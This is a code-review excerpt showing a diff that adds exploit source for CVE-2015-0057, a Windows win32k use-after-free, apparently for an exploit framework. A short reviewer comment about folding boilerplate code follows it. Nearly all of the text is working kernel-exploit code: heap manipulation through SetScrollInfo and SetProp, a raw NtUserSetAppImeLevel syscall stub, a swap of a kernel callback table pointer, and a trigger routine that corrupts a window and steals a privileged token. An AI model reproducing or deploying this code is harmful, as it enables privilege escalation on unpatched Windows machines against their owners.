external/source/exploits/cve-2015-0057/cve-2015-0057/cve-2015-0057.c

```diff
@@ -0,0 +1,519 @@
+	}
+	dprintf("    [*] Inside client load library hWnd: 0x%p", hWnd);
+	g_bFreeDatSbInfo = FALSE;
+
+	SCROLLINFO si;
+	ZeroMemory(&si, sizeof(SCROLLINFO));
+	si.cbSize = sizeof(SCROLLINFO);
+	si.fMask = (1 | SIF_PAGE);
+	si.nPage = 1;
+
+	/* has to be called twice to setup the flags for freeing */
+	SetScrollInfo(hWnd, SB_HORZ, &si, FALSE);
+	SetScrollInfo(hWnd, SB_VERT, &si, FALSE);
+
+	/* this SetProp triggers the reallocation to (hopefully) replace the recently freed tagSBINFO */
+	SetProp(hWnd, "TRIGGER", (PVOID)0xdead1337);
+	return 0;
+}
+
+NTSTATUS __declspec(naked) __stdcall NtUserSetAppImeLevel(HWND hWnd, HANDLE hData) {
+	__asm {
+		mov     eax, 0x121a
+		mov     edx, 0x7FFE0300
+		call    [edx]
+		retn    0x08
+	}
+}
+
+PVOID swap_kernel_callback(PVOID table, DWORD pos, PVOID new_func) {
+	PVOID old_func = NULL;
+	DWORD dwBytesWritten;
+
+	old_func = ((PVOID *)table)[pos];
+	dprintf("[*] Original function pointer: 0x%p", old_func);
+	dprintf("[*] New function pointer:      0x%p", new_func);
+	if (WriteProcessMemory(GetCurrentProcess(), &((PVOID *)table)[pos], &new_func, PTR_SIZE, &dwBytesWritten)) {
+		return old_func;
+	}
+	return NULL;
+}
+
+BOOL trigger_vuln(HWND hWnd, HWND hTemp, PVOID pSbInfoLocation)
+{
+	g_dwHookCtr = 0;
+	g_bFreeDatSbInfo = TRUE;
+	/* wArrows == ESB_DISABLE_BOTH NOT ESB_ENABLE_BOTH */
+	if (EnableScrollBar(hWnd, SB_BOTH, ESB_DISABLE_BOTH) == 0) {
+		dprintf("[!] EnableScrollBar failed %u", GetLastError());
+	}
+	g_bFreeDatSbInfo = FALSE;
+
+	if ((((PPROPLIST)pSbInfoLocation)->iFirstFree != 3) || (((PPROPLIST)pSbInfoLocation)->aprop[0].hData != (PVOID)0xc0ffee01)) {
+		dprintf("[!] PROPLIST allocated at wrong location");
+		return FALSE;
+	}
+
+	SetProp(g_hWndTarget, "PWN 1", g_bDataBackup[8]);
+	SetProp(g_hWndTarget, "PWN 2", g_bDataBackup[10]);
+	SetProp(g_hWndTarget, "PWN 3", g_bDataBackup[12]);
+	SetProp(g_hWndTarget, "PWN 4", g_bDataBackup[14]);
+	SetProp(g_hWndTarget, "PWN 5", g_bDataBackup[16]);
+	SetProp(g_hWndTarget, "PWN 6", g_bDataBackup[18]);
+	SetProp(g_hWndTarget, "PWN 7", g_bDataBackup[20]);
+	SetProp(g_hWndTarget, "PWN 8", g_bDataBackup[22]);
+	NtUserSetAppImeLevel(g_hWndTarget, g_bDataBackup[24]); /* sets hTemp->bServerSideWindowProc = 1 */
+
+	g_bStealDatToken = TRUE;
+	if (SendMessage(hTemp, (WM_USER + 1), 0x1337, 0x1337) == ~0x1337) {
+		dprintf("[+] SendMessage WM_USER + 1 succeeded");
+	}
+	else {
+		dprintf("[!] SendMessage failed: %i, window might be corrupt", GetLastError());
+		return FALSE;
+	}
+
+	if (g_bStealDatToken == FALSE) {
+		return TRUE;
+	}
+	return FALSE;
+}
+
+void win32k_use_after_free(LPVOID lpPayload)
+{
+	WNDCLASSA wndClass;
+	char szNtName[256];
+	PVOID pNtBase;
+	OSVERSIONINFOA versionInfo;
+
+	// Getting Windows version
+	memset(&versionInfo, 0, sizeof(OSVERSIONINFOA));
+	versionInfo.dwOSVersionInfoSize = 148;
+
+	if (!GetVersionExA(&versionInfo))
+	{
+		dprintf("[!] Failed to get windows version");
+		return;
+	}
+
+	/* collapse this code */
+	if (TRUE) {

```

Comment:
That's correct. The block is almost entirely copy pasta, so folding it makes navigating to the sections relevant to the exploit easier. Is there an alternative approach that would be preferred, perhaps making it into a function?